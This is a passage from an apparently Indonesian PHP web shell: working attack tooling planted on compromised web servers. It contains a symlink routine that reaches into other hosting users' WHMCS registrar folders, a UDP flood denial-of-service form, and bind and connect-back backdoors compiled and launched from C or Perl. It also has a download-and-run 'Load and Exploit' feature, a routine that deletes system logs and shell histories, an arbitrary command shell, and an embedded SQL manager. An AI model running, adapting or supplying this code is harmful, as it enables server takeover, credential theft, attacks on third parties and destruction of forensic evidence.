  6087. die('Kurang Ganteng Cok');
  6088. }
  6089. @mkdir(WHMCS, 0755);
  6090. @chdir(WHMCS);
  6091. $htaccess=$_POST['soft'];
  6092. file_put_contents(".htaccess",$htaccess, FILE_APPEND);
  6093. $passwd=explode("\n",$_POST["passwd"]);
  6094. foreach($passwd as $pwd) {
  6095. $user=trim($pwd);
  6096. @symlink('/' .$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER');
  6097. @symlink('/' .$home.'/'.$user.'/public_html/modules/registrars/',$user.' <~ WHMCS-1');
  6098. @symlink('/' .$home.'/'.$user.'/public_html/account/modules/registrars/',$user.' <~ WHMCS-2');
  6099. @symlink('/' .$home.'/'.$user.'/public_html/accounts/modules/registrars/',$user.' <~ WHMCS-3');
  6100. @symlink('/' .$home.'/'.$user.'/public_html/central/modules/registrars/',$user.' <~ WHMCS-4');
  6101. @symlink('/' .$home.'/'.$user.'/public_html/clienti/modules/registrars/',$user.' <~ WHMCS-5');
  6102. @symlink('/' .$home.'/'.$user.'/public_html/client/modules/registrars/',$user.' <~ WHMCS-6');
  6103. @symlink('/' .$home.'/'.$user.'/public_html/cliente/modules/registrars/',$user.' <~ WHMCS-7');
  6104. @symlink('/' .$home.'/'.$user.'/public_html/clientes/modules/registrars/',$user.' <~ WHMCS-8');
  6105. @symlink('/' .$home.'/'.$user.'/public_html/clients/modules/registrars/',$user.' <~ WHMCS-9');
  6106. @symlink('/' .$home.'/'.$user.'/public_html/clientarea/modules/registrars/',$user.' <~ WHMCS-9');
  6107. @symlink('/' .$home.'/'.$user.'/public_html/clientsarea/modules/registrars/',$user.' <~ WHMCS-10');
  6108. @symlink('/' .$home.'/'.$user.'/public_html/client-area/modules/registrars/',$user.' <~ WHMCS-11');
  6109. @symlink('/' .$home.'/'.$user.'/public_html/clients-area/modules/registrars/',$user.' <~ WHMCS-12');
  6110. @symlink('/'.$home.'/'.$user.'/public_html/clientzone/modules/registrars/',$user.' <~ WHMCS-13');
  6111. @symlink('/'.$home.'/'.$user.'/public_html/client-zone/modules/registrars/',$user.' <~ WHMCS-14');
  6112. @symlink('/'.$home.'/'.$user.'/public_html/core/modules/registrars/',$user.' <~ WHMCS-15');
  6113. @symlink('/'.$home.'/'.$user.'/public_html/company/modules/registrars/',$user.' <~ WHMCS-16');
  6114. @symlink('/'.$home.'/'.$user.'/public_html/customer/modules/registrars/',$user.' <~ WHMCS-17');
  6115. @symlink('/'.$home.'/'.$user.'/public_html/customers/modules/registrars/',$user.' <~ WHMCS-18');
  6116. @symlink('/'.$home.'/'.$user.'/public_html/bill/modules/registrars/',$user.' <~ WHMCS-19');
  6117. @symlink('/'.$home.'/'.$user.'/public_html/billing/modules/registrars/',$user.' <~ WHMCS-20');
  6118. @symlink('/'.$home.'/'.$user.'/public_html/finance/modules/registrars/',$user.' <~ WHMCS-21');
  6119. @symlink('/'.$home.'/'.$user.'/public_html/financeiro/modules/registrars/',$user.' <~ WHMCS-22');
  6120. @symlink('/'.$home.'/'.$user.'/public_html/host/modules/registrars/',$user.' <~ WHMCS-23');
  6121. @symlink('/'.$home.'/'.$user.'/public_html/hosts/modules/registrars/',$user.' <~ WHMCS-24');
  6122. @symlink('/'.$home.'/'.$user.'/public_html/hosting/modules/registrars/',$user.' <~ WHMCS-25');
  6123. @symlink('/'.$home.'/'.$user.'/public_html/hostings/modules/registrars/',$user.' <~ WHMCS'-26);
  6124. @symlink('/'.$home.'/'.$user.'/public_html/klien/modules/registrars/',$user.' <~ WHMCS-27');
  6125. @symlink('/'.$home.'/'.$user.'/public_html/manage/modules/registrars/',$user.' <~ WHMCS-28');
  6126. @symlink('/'.$home.'/'.$user.'/public_html/manager/modules/registrars/',$user.' <~ WHMCS-29');
  6127. @symlink('/'.$home.'/'.$user.'/public_html/member/modules/registrars/',$user.' <~ WHMCS-30');
  6128. @symlink('/'.$home.'/'.$user.'/public_html/members/modules/registrars/',$user.' <~ WHMCS-31');
  6129. @symlink('/'.$home.'/'.$user.'/public_html/my/modules/registrars/',$user.' <~ WHMCS-32');
  6130. @symlink('/'.$home.'/'.$user.'/public_html/myaccount/modules/registrars/',$user.' <~ WHMCS-33');
  6131. @symlink('/'.$home.'/'.$user.'/public_html/my-account/client/modules/registrars/',$user.' <~ WHMCS-34');
  6132. @symlink('/'.$home.'/'.$user.'/public_html/myaccounts/modules/registrars/',$user.' <~ WHMCS-35');
  6133. @symlink('/'.$home.'/'.$user.'/public_html/my-accounts/modules/registrars/',$user.' <~ WHMCS-36');
  6134. @symlink('/'.$home.'/'.$user.'/public_html/order/modules/registrars/',$user.' <~ WHMCS-37');
  6135. @symlink('/'.$home.'/'.$user.'/public_html/orders/modules/registrars/',$user.' <~ WHMCS-38');
  6136. @symlink('/'.$home.'/'.$user.'/public_html/painel/modules/registrars/',$user.' <~ WHMCS-39');
  6137. @symlink('/'.$home.'/'.$user.'/public_html/panel/modules/registrars/',$user.' <~ WHMCS-40');
  6138. @symlink('/'.$home.'/'.$user.'/public_html/panels/modules/registrars/',$user.' <~ WHMCS-41');
  6139. @symlink('/'.$home.'/'.$user.'/public_html/portal/modules/registrars/',$user.' <~ WHMCS-42');
  6140. @symlink('/'.$home.'/'.$user.'/public_html/portals/modules/registrars/',$user.' <~ WHMCS-43');
  6141. @symlink('/'.$home.'/'.$user.'/public_html/secure/modules/registrars/',$user.' <~ WHMCS-44');
  6142. @symlink('/'.$home.'/'.$user.'/public_html/support/modules/registrars/',$user.' <~ WHMCS-45');
  6143. @symlink('/'.$home.'/'.$user.'/public_html/supporte/modules/registrars/',$user.' <~ WHMCS-46');
  6144. @symlink('/'.$home.'/'.$user.'/public_html/supports/modules/registrars/',$user.' <~ WHMCS-47');
  6145. @symlink('/'.$home.'/'.$user.'/public_html/web/modules/registrars/',$user.' <~ WHMCS-48');
  6146. @symlink('/'.$home.'/'.$user.'/public_html/webhost/modules/registrars/',$user.' <~ WHMCS-49');
  6147. @symlink('/'.$home.'/'.$user.'/public_html/webhosting/modules/registrars/',$user.' <~ WHMCS-50');
  6148. @symlink('/'.$home.'/'.$user.'/public_html/whm/modules/registrars/',$user.' <~ WHMCS-51');
  6149. @symlink('/'.$home.'/'.$user.'/public_html/whmcs/modules/registrars/',$user.' <~ WHMCS-52');
  6150. @symlink('/'.$home.'/'.$user.'/public_html/whmcs2/modules/registrars/',$user.' <~ WHMCS-53');
  6151. @symlink('/'.$home.'/'.$user.'/public_html/Whm/modules/registrars/',$user.' <~ WHMCS-54');
  6152. @symlink('/'.$home.'/'.$user.'/public_html/Whmcs/modules/registrars/',$user.' <~ WHMCS-55');
  6153. @symlink('/'.$home.'/'.$user.'/public_html/WHM/modules/registrars/',$user.' <~ WHMCS-56');
  6154. @symlink('/'.$home.'/'.$user.'/public_html/WHMCS/modules/registrars/',$user.' <~ WHMCS-57');
  6155. }
  6156. echo '<hr color="#00bfff"><center>
  6157. <font face="Audiowide" size="5" style="color:lime;background-color:#000000">
  6158. <img src="http://www.komunitas.for-indonesia.com/images/smiley/piss.gif"><br/>
  6159. Scanning Complete....<br/>
  6160. Now Checking Folder Result....<br/><br/><br/>
  6161. <a href="/WHMCS">O=[ GO TO HELL ]=O</a>
  6162. </font>
  6163. <br/><br/><br/></center>';
  6164. }
  6165.  
  6166. }elseif(isset($_GET['x'])&&($_GET['x']=='cp3')){
  6167.  
  6168. }elseif(isset($_GET['x'])&&($_GET['x']=='dos')){
  6169. echo'<form action="?dm='.$pwd.'&amp;x=dos" method="post">';
  6170. if(isset($_GET['host']) && isset($_GET['time'])){
  6171. $packets=0;
  6172. ignore_user_abort(TRUE);
  6173. set_time_limit(0);
  6174. $exec_time=$_GET['time'];
  6175. $time=time();
  6176. print"Started: ".time('d-m-y h:i:s')."<br>";
  6177. $max_time=$time+$exec_time;
  6178. $host=$_GET['host'];
  6179. for($i=0;$i<65000;$i++){
  6180. $out .= 'X';
  6181. }
  6182. while(1){
  6183. $packets++;
  6184. if(time()>$max_time){
  6185. break;
  6186. }
  6187. $rand=rand(1,65000);
  6188. $fp=fsockopen('udp://'.$host,$rand,$errno,$errstr,5);
  6189. if($fp){
  6190. fwrite($fp,$out);
  6191. fclose($fp);
  6192. }
  6193. }
  6194. echo "<br><b>UDP Flood</b><br>
  6195. Completed with $packets (".round(($packets*65)/1024,2)." MB) packets averaging ".round($packets/$exec_time,2)." packets per second \n";
  6196. echo '<br><br><form action="'.$surl.'" method=GET><input type="hidden" name="act" value="phptools">
  6197. Host: <br><input type=text name=host><br>
  6198. Length (seconds): <br><input type=text name=time><br>
  6199. <input type=submit value=Go></form>';
  6200. }else{
  6201. echo '<center><form action=? method=GET><input type="hidden" name="act" value="phptools">
  6202. <table class="tabnet" style="width:300px;">
  6203. <tr><th colspan="2">UDP Flood</th></tr>
  6204. <tr><td>&nbsp;&nbsp;Host</td>
  6205. <td><input style="width:220px;" class="inputz" type=text name=host value=></td></tr>
  6206. <tr><td>&nbsp;&nbsp;Length (seconds)</td>
  6207. <td><input style="width:220px;" class="inputz" type=text name=time value=></td></tr>
  6208. <tr><td colspan=2 align=center><input style="width:100%;" class="inputzbut" type="submit" value="Attack !" /></td></tr>
  6209. </table></center>';
  6210. }
  6211. echo'</form>';
  6212. }elseif(isset($_GET['x'])&&($_GET['x']=='phpinfo')){
  6213. ob_start();
  6214. phpinfo();
  6215. $a=ob_get_contents();
  6216. ob_end_clean();
  6217. echo'<br /><div class="phpinfo">'.preg_replace('%^.*<body>(.*)</body>.*$%ms','$1',$a).'</div>';
  6218. }elseif(isset($_GET['view'])&&($_GET['view']!="")){
  6219. if(is_file($_GET['view'])){
  6220. if(!isset($file))$file=magicboom($_GET['view']);
  6221. if(!$win && $posix){
  6222. $name=@posix_getpwuid(@fileowner($file));
  6223. $group=@posix_getgrgid(@filegroup($file));
  6224. $owner=$name['name']."<span class=\"gaya\">:</span>".$group['name'];
  6225. }else{
  6226. $owner=$user;
  6227. }
  6228. $filn=basename($file);
  6229. echo "<center><table border=\"1\" bordercolor=\"lime\" style=\"border-collapse:collapse;margin:10px;line-height:20px;\">
  6230. <tr><td>Filename</td>
  6231. <td><span id=\"".clearspace($filn)."_link\">".$file."</span>
  6232. <form action=\"?dm=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  6233. <input type=\"hidden\" name=\"old_name\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
  6234. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"new_name\" value=\"".$filn."\" />
  6235. <input class=\"inputzbut\" type=\"submit\" name=\"re_name\" value=\"Rename\" />
  6236. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"Cancel\"
  6237. onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
  6238. </form></td></tr>
  6239. <tr><td>Size</td>
  6240. <td>".ukuran($file)."</td></tr>
  6241. <tr><td>Permission</td>
  6242. <td>".get_perms($file)." &nbsp; (".substr(sprintf('%o',fileperms($file)),-4).")</td></tr>
  6243. <tr><td>Owner</td>
  6244. <td>".$owner."</td></tr>
  6245. <tr><td>Create time</td>
  6246. <td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
  6247. <tr><td>Last modified</td>
  6248. <td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
  6249. <tr><td>Last accessed</td>
  6250. <td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
  6251. <tr><td>Actions</td>
  6252. <td><a href=\"?dm=$pwd&amp;ed=$file\">Edit</a> <span class='infodmx'>&#x7C;&#x7C;</span> <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">Rename</a> <span class='infodmx'>&#x7C;&#x7C;</span> <a href=\"?dm=$pwd&amp;delete=$file\" onclick=\"return confirm('Hapus $file ?')\">Delete</a> <span class='infodmx'>&#x7C;&#x7C;</span> <a href=\"?dm=$pwd&amp;dl=$file\">Download</a> <span class='infodmx'>&#x7C;&#x7C;</span> <a href=\"?dm=$pwd&amp;dlgzip=$file\">Gzip</a> <span class='infodmx'>&#x7C;&#x7C;</span> <a href=\"?dm=$pwd&amp;dlzip=$file\">Zip</a> </td></tr>
  6253. <tr><td>View</td><td><a target=\"_blank\" href=\"?dm=".$pwd."&amp;view=".$file."&amp;type=phpsyntax\">Php Syntax</a> <span class='infodmx'>&#x7C;&#x7C;</span> <a target=\"_blank\" href=\"?dm=".$pwd."&amp;view=".$file."&amp;type=code\">Highlight Code</a> <span class='infodmx'>&#x7C;&#x7C;</span> <a target=\"_blank\" href=\"?dm=".$pwd."&amp;view=".$file."\">Text</a> <span class='infodmx'>&#x7C;&#x7C;</span> <a target=\"_blank\" href=\"?dm=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr> </table></center>";
  6254. if(isset($_GET['type'])&&($_GET['type'] == 'image')){
  6255. echo'<br/><div style="text-align:center;margin:8px;">
  6256. <img class="view_images" src="?dm='.$pwd.'&amp;img='.$filn.'"></div>';
  6257. }elseif(isset($_GET['type'])&&($_GET['type'] == 'embed')){
  6258. }elseif(isset($_GET['type'])&&($_GET['type'] == 'phpsyntax')){
  6259. echo"<div class=\"viewfile\">";
  6260. echo phpSyntax($file);
  6261. echo"</div>";
  6262. }elseif(isset($_GET['type']) && ($_GET['type'] == 'code')){
  6263. echo"<div class=\"viewfile\">";
  6264. highlight_num($file);
  6265. //@highlight_string(wordwrap(@file_get_contents($file),150,"\n"));
  6266. echo"</div>";
  6267. }else{
  6268. echo"<div class=\"viewfile\">";
  6269. echo nl2br(htmlentities(wordwrap(@file_get_contents($file),150,"\n")));
  6270. echo"</div>";
  6271. }
  6272. }elseif(is_dir($_GET['view'])){
  6273. echo showdir($pwd,$prompt);
  6274. }
  6275. }elseif(isset($_GET['ed'])&&($_GET['ed']!="")){
  6276. if(isset($_POST['save'])) {
  6277. $file=$_POST['saveas'];
  6278. $content=magicboom($_POST['content']);
  6279. if($filez=fopen($file,"w")) {
  6280. $time=date("d-M-Y H:i",time());
  6281. if(fwrite($filez,$content)) {
  6282. $msg='file saved <span class="gaya">@</span> '.$time;
  6283. }else{
  6284. $msg='Failed to save';
  6285. }
  6286. fclose($filez);
  6287. }else{
  6288. $msg='Permission Denied';
  6289. }
  6290. }
  6291. if(!isset($file))
  6292. $file=$_GET['ed'];
  6293. if($filez=fopen($file, "r")) {
  6294. $content="";
  6295. while(!feof($filez)) {
  6296. //$content .= htmlentities(str_replace("","",fgets($filez)));
  6297. $content.=htmlspecialchars(str_replace("","",fgets($filez)));
  6298. }
  6299. fclose($filez);
  6300. }
  6301. echo'<form action="?dm='.$pwd.'&amp;ed='.$file.'" method="post">
  6302. <table class="cmdbox">
  6303. <tr><td colspan="2">
  6304. <textarea class="output" name="content">'.$content.'</textarea></td>
  6305. <tr>
  6306. <td colspan="2">Nama/Lokasi File: '.$file.'
  6307. <br />Ukuran: '.ukuran($file).'
  6308. <br />Save as <input id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="'.$file.'" />
  6309. <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;'.$msg.'</td></tr></table> </form>';
  6310.  
  6311. }elseif(isset($_GET['x'])&&($_GET['x']=='upload')){
  6312. if(isset($_POST['uploadcomp'])){
  6313. $tmp_name=$_FILES['file']['tmp_name'];
  6314. if(is_uploaded_file($tmp_name)){
  6315. $pindah=magicboom($_POST['path']).$_FILES['file']['name'];
  6316. $stat=@move_uploaded_file($tmp_name,$pindah);
  6317. if($stat){$msg="<br><span class='b11'>File Uploaded To $pindah <br> Ukuran: ".ukuran($pindah);}else{$msg="<br>Failed To Upload $fname";}
  6318. }else{$msg="<br>Failed To Upload $fname </span>";}
  6319. }elseif(isset($_POST['uploadurl'])){
  6320. $namafile=download(trim($_POST['pilihan']),trim($_POST['wurl']));
  6321. $pindah=magicboom($_POST['path']).$namafile;
  6322. if(is_file($pindah)){$msg="<br><span class='b11'>File Uploaded To $pindah <br> Ukuran: ".ukuran($pindah);}else{ $msg="<br>Failed Upload $namafile </span>";}
  6323. }
  6324. echo'
  6325. <form action="?dm='.$pwd.'&amp;x=upload" enctype="multipart/form-data" method="post">
  6326. <br><br><table class="tabnet" style="width:320px;padding:0 1px;">
  6327. <tr><th colspan="2"><b> <span class="b12"> _UPLOAD FILE_</span></b></th></tr>
  6328. <tr><td colspan="2"><p style="text-align:center;"><input style="color:lime;background-color: rgba(0, 0, 0, 0.3);
  6329. background: rgba(0, 0, 0, 0.3);" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut"></p></td></tr>
  6330. <tr><td colspan="2">
  6331. <input type="text" class="inputz" style="width:99%;" name="path" value="'.$pwd.'" /></td></tr>
  6332. </table>
  6333. </form>
  6334. <table class="tabnet" style="width:320px;padding:0 1px;">
  6335. <tr><th colspan="2"><b><span class="b12"> _UPLOAD FROM URL_</span></b></th></tr>
  6336. <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?dm='.$pwd.'&amp;x=upload">
  6337. <table>
  6338. <tr>
  6339. <td>URL:</td>
  6340. <td><input class="inputz" type="text" name="wurl" style="width:250px;" placeholder="http://example.com/dir/file.zip" value=""></td></tr>
  6341. <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="'.$pwd.'" /></td></tr>
  6342. <tr><td colspan="2" align="center">
  6343. <select name="pilihan">
  6344. <option value="ccurl">Curl</option>
  6345. <option value="wwget">Wget</option>
  6346. <option value="wlynx">Lynx</option>
  6347. <option value="wfread">Fread</option>
  6348. <option value="wfetch">Fetch</option>
  6349. <option value="wlinks">Links</option>
  6350. <option value="wget">Get</option>
  6351. <option value="wcurl">Curl 1</option>
  6352. </select></td></tr>
  6353. <td><td colspan="2" align="center"><input type="submit" name="uploadurl" class="inputzbut"></td></tr>
  6354. </table></form></td> </tr></table>
  6355. <div style="text-align:center;margin:2px;">'.$msg.'</div>';
  6356.  
  6357. }elseif(isset($_GET['x'])&&($_GET['x']=='ns')){
  6358. if(isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')){
  6359. $port=trim($_POST['port']);
  6360. $passwrd=trim($_POST['bind_pass']);
  6361. tulis("bdc.c",$port_bind_bd_c);
  6362. exe("gcc -o bdc bdc.c");
  6363. exe("chmod 777 bdc");
  6364. @unlink("bdc.c");
  6365. exe("./bdc ".$port." ".$passwrd." &");
  6366. $scan=exe("ps aux");
  6367. if(preg_match("./bdc $por",$scan)){
  6368. $msg="<p>Process found running, backdoor setup successfully.</p>";
  6369. }else{
  6370. $msg="<p>Process not found running, backdoor not setup successfully.</p>";
  6371. }
  6372. }elseif(isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')){
  6373. $port=trim($_POST['port']);
  6374. $passwrd=trim($_POST['bind_pass']);
  6375. tulis("bdp",$port_bind_bd_pl);
  6376. exe("chmod 777 bdp");
  6377. $p2=which("perl");
  6378. exe($p2." bdp ".$port." &");
  6379. $scan=exe("ps aux");
  6380. if(preg_match("$p2 bdp $port",$scan)){
  6381. $msg="<p>Process found running, backdoor setup successfully.</p>";
  6382. }else{
  6383. $msg="<p>Process not found running, backdoor not setup successfully.</p>";
  6384. }
  6385. }elseif(isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')){
  6386. $ip=trim($_POST['ip']);
  6387. $port=trim($_POST['backport']);
  6388. tulis("bcc.c",$back_connect_c);
  6389. exe("gcc -o bcc bcc.c");
  6390. exe("chmod 777 bcc");
  6391. @unlink("bcc.c");
  6392. exe("./bcc ".$ip." ".$port." &");
  6393. $msg="Now script try connect to ".$ip." port ".$port." ...";
  6394. }elseif(isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')){
  6395. $ip=trim($_POST['ip']);
  6396. $port=trim($_POST['backport']);
  6397. tulis_2("bcp",$back_connect);
  6398. exe("chmod +x bcp");
  6399. $p2=which("perl");
  6400. exe($p2." bcp ".$ip." ".$port." &");
  6401. sleep(1);
  6402. $msg="Now script try connect to ".$ip." port ".$port." ...";
  6403. unlink("bcp");
  6404. }elseif(isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])){
  6405. $pilihan=trim($_POST['pilihan']);
  6406. $wurl=trim($_POST['wurl']);
  6407. $namafile=download($pilihan,$wurl);
  6408. if(is_file($namafile)){
  6409. $msg=exe($wcmd);
  6410. } else $msg="error: file not found $namafile";
  6411. }
  6412. ?>
  6413. <table class="tabnet"><tr>
  6414. <th>Port Binding</th>
  6415. <th>Connect Back</th>
  6416. <th>Load and Exploit</th></tr>
  6417. <tr><td>
  6418. <form method="post" actions="?dm=<?php echo $pwd; ?>&amp;x=ns">
  6419. <table><tr><td>Port</td>
  6420. <td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>
  6421. <tr><td>Password</td>
  6422. <td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr>
  6423. <tr><td>Use</td>
  6424. <td style="text-align:justify">
  6425. <p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select><input class="inputzbut" type="submit" name="bind" value="Bind !" style="width:120px"></td></tr></table>
  6426. </form></td>
  6427. <td> <form method="post" actions="?dm=<?php echo $pwd; ?>&amp;x=ns">
  6428. <table><tr><td>IP</td>
  6429. <td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR'))?(getenv('REMOTE_ADDR')): ("127.0.0.1"));?>">
  6430. </td>
  6431. </tr>
  6432. <tr><td>Port</td>
  6433. <td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr>
  6434. <tr><td>Use</td>
  6435. <td style="text-align:justify">
  6436. <p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect !" class="inputzbut" style="width:120px"></td></tr></table> </form> </td>
  6437. <td> <form method="post" actions="?dm=<?php echo $pwd; ?>&amp;x=ns">
  6438. <table> <tr><td>url</td>
  6439. <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
  6440. <tr><td>cmd</td>
  6441. <td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr>
  6442. <tr><td><select size="1" class="inputz" name="pilihan">
  6443. <option value="wwget">wget</option>
  6444. <option value="wlynx">lynx</option>
  6445. <option value="wfread">fread</option>
  6446. <option value="wfetch">fetch</option>
  6447. <option value="wlinks">links</option> <option value="wget">GET</option>
  6448. <option value="wcurl">curl</option>
  6449. </select></td>
  6450. <td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go !" style="width:246px;"></td></tr></table></form </td></tr></table>
  6451. <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  6452. <?php
  6453. }elseif(isset($_GET['x'])&&($_GET['x']=='clog')){
  6454. echo "<center><br/><br/><b><span class='b7'>O=:[ Clear Log System History ]:=O</span></b><br/><br/>";
  6455. exe("rm -rf /tmp/logs");
  6456. echo"Clear /tmp/logs <br/>";
  6457. exe("rm -rf /root/.ksh_history");
  6458. echo"Clear /root/.ksh_history<br/>";
  6459. exe("rm -rf /root/.bash_history");
  6460. echo"Clear /root/.bash_history<br/>";
  6461. exe("rm -rf /root/.bash_logout");
  6462. echo"Clear /root/.bash_logout<br/>";
  6463. exe("rm -rf /usr/local/apache/logs");
  6464. echo"Clear /usr/local/apache/log<br/>";
  6465. exe("rm -rf /usr/local/apache/log");
  6466. echo"Clear /usr/local/apache/log<br/>";
  6467. exe("rm -rf /var/apache/logs");
  6468. echo"Clear /var/apache/logs<br/>";
  6469. exe("rm -rf /var/apache/log");
  6470. echo"Clear /var/apache/log<br/>";
  6471. exe("rm -rf /var/run/utmp");
  6472. echo"Clear /var/run/utmp<br/>";
  6473. exe("rm -rf /var/logs");
  6474. echo"Clear /var/logs<br/>";
  6475. exe("rm -rf /var/log");
  6476. echo"Clear /var/log<br/>";
  6477. exe("rm -rf /var/adm");
  6478. echo"Clear /var/adm<br/>";
  6479. exe("rm -rf /etc/wtmp");
  6480. echo"Clear /etc/wtmp<br/>";
  6481. exe("rm -rf /etc/utmp");
  6482. echo"Clear /etc/utmp<br/>";
  6483. exe("rm -rf /var/log/lastlog");
  6484. echo"Clear /var/log/lastlog<br/>";
  6485. exe("rm -rf /var/log/wtmp");
  6486. echo"Clear /var/log/wtmp</center>";
  6487. }elseif(isset($_GET['x'])&&($_GET['x']=='shell')){
  6488. echo'<form action="?dm='.$pwd.'&amp;x=shell"method="post">
  6489. <center><br><br><b><span class="b7">O=:[ Command Line ]:=O</span></b><br><br></center>
  6490. <table class="cmdbox"><tr><td align="center" colspan="2">'.$prompt.'<input id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" />
  6491. <input class="inputzbut" type="submit" value="&#xF058;" name="submitcmd"/></td></tr>';
  6492. if(isset($_POST['submitcmd'])){
  6493. if($_POST['cmd']){
  6494. echo'<tr><td align="center" colspan="2"><textarea class="output">';
  6495. echo exe($_POST['cmd']);
  6496. echo'</textarea></td></tr>';
  6497. }
  6498. }
  6499. echo'</table></form>';
  6500. }elseif(isset($_GET['x']) && ($_GET['x'] == 'phpmyadmin')){
  6501. echo'<center><br><br><span class="b7">O=:[ SQL MANAGER ]:=O<br><br> <center>';
  6502. if(function_exists("mb_internal_encoding"))mb_internal_encoding("8bit");
  6503. global $b,$g,$Wb,$ec,$oc,$n,$Xc,$cd,$ba,$wd,$x,$ca,$Rd,$Qe,$zf,$Vg,$gd,$Ah,$Fh,$Oh,$Vh,$ia;
  6504. if(!$_SERVER["REQUEST_URI"])
  6505. $_SERVER["REQUEST_URI"]=$_SERVER["ORIG_PATH_INFO"];
  6506. if(!strpos($_SERVER["REQUEST_URI"], '?')&&$_SERVER["QUERY_STRING"]!="")
  6507. $_SERVER["REQUEST_URI"].="?$_SERVER[QUERY_STRING]";
  6508. $ba=$_SERVER["HTTPS"]&&strcasecmp($_SERVER["HTTPS"], "off");
  6509.  
  6510. @ini_set("session.use_trans_sid",false);
  6511. session_cache_limiter("");
  6512.  
  6513. if(!defined("SID")) {
  6514. session_name("adminer_sid");
  6515. $F=array(0,preg_replace('~\\?.*~','',$_SERVER["REQUEST_URI"]),"",$ba);
  6516. if(version_compare(PHP_VERSION, '5.2.0')>=0)
  6517. $F[]=true;
  6518. call_user_func_array('session_set_cookie_params',$F);
  6519. session_start();
  6520. }
  6521.  
  6522. remove_slashes(array(&$_GET,&$_POST,&$_COOKIE),$Jc);
  6523.  
  6524. if(get_magic_quotes_runtime()){
  6525. set_magic_quotes_runtime(false);
  6526. }
  6527.  
  6528. function get_lang() {
  6529. return 'en';
  6530. }
  6531.  
  6532. function lang($Eh,$He=null) {
  6533. if(is_array($Eh)) {
  6534. $Bf=($He==1?0:1);
  6535. $Eh=$Eh[$Bf];
  6536. }
  6537. $Eh=str_replace("%d","%s",$Eh);
  6538. $He=format_number($He);
  6539. return sprintf($Eh,$He);
  6540. }
  6541.  
  6542.  
  6543. if(extension_loaded('pdo')) {
  6544. class Min_PDO extends PDO {
  6545. var $_result,$server_info,$affected_rows,$errno,$error;
  6546. function __construct() {
  6547. global $b;
  6548. $Bf=array_search("SQL",$b->operators);
  6549. if($Bf!==false)
  6550. unset($b->operators[$Bf]);
  6551. }
  6552. function dsn($bc,$V,$G) {
  6553. try {
  6554. parent::__construct($bc,$V,$G);
  6555. }
  6556. catch(Exception $tc) {
  6557. auth_error(h($tc->getMessage()));
  6558. }
  6559. $this->setAttribute(13, array('Min_PDOStatement'));
  6560. $this->server_info=@$this->getAttribute(4);
  6561. }
  6562. function query($H,$Ph=false) {
  6563. $I=parent::query($H);
  6564. $this->error="";
  6565. if(!$I) {
  6566. list(,$this->errno,$this->error)=$this->errorInfo();
  6567. return false;
  6568. }
  6569. $this->store_result($I);
  6570. return $I;
  6571. }
  6572. function multi_query($H) {
  6573. return $this->_result=$this->query($H);
  6574. }
  6575. function store_result($I=null) {
  6576. if(!$I) {
  6577. $I=$this->_result;
  6578. if(!$I)
  6579. return false;
  6580. }
  6581. if($I->columnCount()) {
  6582. $I->num_rows=$I->rowCount();
  6583. return $I;
  6584. }
  6585. $this->affected_rows=$I->rowCount();
  6586. return true;
  6587. }
  6588. function next_result() {
  6589. if(!$this->_result)
  6590. return false;
  6591. $this->_result->_offset=0;
  6592. return @$this->_result->nextRowset();
  6593. }
  6594. function result($H,$o=0) {
  6595. $I=$this->query($H);
  6596. if(!$I)
  6597. return false;
  6598. $K=$I->fetch();
  6599. return $K[$o];
  6600. }
  6601. }
  6602. class Min_PDOStatement extends PDOStatement {
  6603. var $_offset=0,$num_rows;
  6604. function fetch_assoc() {
  6605. return $this->fetch(2);
  6606. }
  6607. function fetch_row() {
  6608. return $this->fetch(3);
  6609. }
  6610. function fetch_field() {
  6611. $K=(object) $this->getColumnMeta($this->_offset++);
  6612. $K->orgtable=$K->table;
  6613. $K->orgname=$K->name;
  6614. $K->charsetnr=(in_array("blob",(array) $K->flags)?63:0);
  6615. return $K;
  6616. }
  6617. }
  6618. }
  6619.  
  6620.  
  6621.  
  6622. $Wb=array();
  6623. class Min_SQL {
  6624. var $_conn;
  6625. function __construct($g) {
  6626. $this->_conn=$g;
  6627. }
  6628. function select($R,$M,$Z,$ad,$af=array(),$z=1,$E=0,$Jf=false) {
  6629. global $b,$x;
  6630. $Cd=(count($ad)<count($M));
